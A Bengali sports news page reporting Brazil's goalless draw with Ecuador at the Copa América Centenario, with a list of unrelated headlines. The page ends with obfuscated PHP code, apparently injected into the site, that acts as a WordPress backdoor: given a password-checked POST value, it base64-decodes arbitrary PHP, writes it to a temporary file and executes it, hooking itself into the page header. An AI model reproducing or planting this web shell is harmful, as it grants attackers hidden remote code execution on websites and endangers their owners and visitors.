শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

ব্রাজিলকে রুখে দিল ইকুয়েডর

ecuador-brazil_15174_1465100912স্পোর্টস ডেস্ক : কোপা আমেরিকার শতবর্ষ আয়োজনের শুরুটা ভালো হলো না ফুটবলের দেশ ব্রাজিলের। ইকুয়েডরের বিপক্ষে গোলশূন্য ড্র করে মাঠ ছেড়েছে দুঙ্গার শিষ্যরা।

রোববার সকালে যুক্তরাষ্ট্রের ক্যালিফোর্নিয়ার রোস বোলে গ্রুপ ‘বি’ থেকে মুখোমুখি হয় ব্রাজিল ও ইকুয়েডর।

কোপায় এবার খেলছেন না ব্রাজিল দলের সেরা পারফরমার নেইমার। ম্যাচজুড়েই ছিল তার অভাব। এরপরেও উইলিয়ান-আলভেজরা নিজেদের সবোর্চ্চটুকু দিয়ে চেষ্টা চালিয়েছেন জয়ের জন্য।

ম্যাচের পঞ্চম মিনিটে প্রথম সুযোগটা তৈরি করে ইকুয়েডর। তবে মিলার বোলানোসের শট ডান পোস্টের সামান্য বাইরে দিয়ে যায়।

পরের মিনিটেই চেলসির মিডফিল্ডার উইলিয়ানের ক্রস থেকে কৌতিনিয়োর শট কর্নারের বিনিময়ে ঠেকান গোলরক্ষক। প্রথমার্ধের বাকি সময়টায় কর্তৃত্ব ছিল ব্রাজিলেরই। তবে কোনো আক্রমণই গোলমুখে গিয়ে সফলতার মুখ দেখেনি।

এক ঘণ্টা গোলশূন্য থাকার পর জোনাসকে উঠিয়ে গাব্রিয়েল বারবোসাকে নামান দুঙ্গা। কিন্তু ব্রাজিলকে গোল এনে দিতে পারেননি সান্তোসের এই তরুণ ফরোয়ার্ড।

৬৬তম মিনিটে নিচু একটি ক্রসে বল ঠিকমতো ধরতে না পেরে জালেই ঢুকিয়ে দিয়েছিলেন ব্রাজিল গোলরক্ষক আলিসন। ভাগ্যিস ক্রসটির আগে বল লাইন পেরিয়ে গিয়েছিল। ডাগআউটে ইকুয়েডরের কোচ-কর্মকর্তারা লাফিয়ে উঠলেও উদযাপনটা দ্রতই থেমে যায়।

৮৩তম মিনিটে দ্বিতীয়ার্ধের সবচেয়ে ভালো সুযোগটা পেয়েছিলেন উইলিয়ানের বদলি হিসেবে নামা লুকাস মউরা। রেনেতো আগুস্তোর উঁচু পাস থেকে তার হেড একুয়েডর গোলরক্ষককে ফাঁকি দিলেও পোস্টের একটু বাইরে দিয়ে যায়।

শেষ পর্যন্ত পয়েন্ট ভাগাভাগি করেই মাঠ ছাড়তে হয় সেলেকাওদের। অন্যদিকে ‘বি’ গ্রুপের প্রথম ম্যাচে পেরুর কাছে ১-০ গোলে হেরেছে হাইতি।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}